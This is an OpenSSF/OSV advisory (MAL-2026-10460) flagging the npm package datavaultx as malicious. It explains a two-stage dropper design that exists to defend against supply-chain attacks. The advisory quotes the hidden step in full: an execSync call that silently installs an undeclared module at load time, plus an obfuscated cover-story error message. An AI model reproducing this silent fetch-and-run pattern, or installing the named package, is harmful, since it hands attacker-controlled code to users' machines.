OpenSSF/OSV advisory MAL-2026-10460 confirms this npm version as malicious. On require of the package's main entry (auth.js -> lib/writer.js), the module attempts require('auth-gen-next'); on failure it invokes execSync('npm install auth-gen-next --no-warnings --no-save --no-progress --loglevel silent') and then requires the freshly installed module from../../auth-gen-next/index.js...
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in datavaultx (npm)
Details
On require of the package's main entry (auth.js -> lib/writer.js), the module attempts require('auth-gen-next'); on failure it invokes execSync('npm install auth-gen-next --no-warnings --no-save --no-progress --loglevel silent') and then requires the freshly installed module from../../auth-gen-next/index.js. The fetched package is not declared in this package's dependencies, so its contents are entirely attacker-controlled and can change at any time without a datavaultx release. lib/writer.js additionally constructs a cover-story error string ('Error: This environment is not supported...') via a long chain of String.fromCharCode calls, shown only if the silent install fails. The suppressed logging, undeclared dependency, and character-code obfuscation of the failure message together indicate a two-stage dropper design in which the visible package is a thin shim that pulls its real payload from a separately-published module at load time.
Decision reason
One or more suspicious static signals were detected.; source fingerprint signature matched known malicious package; routed for review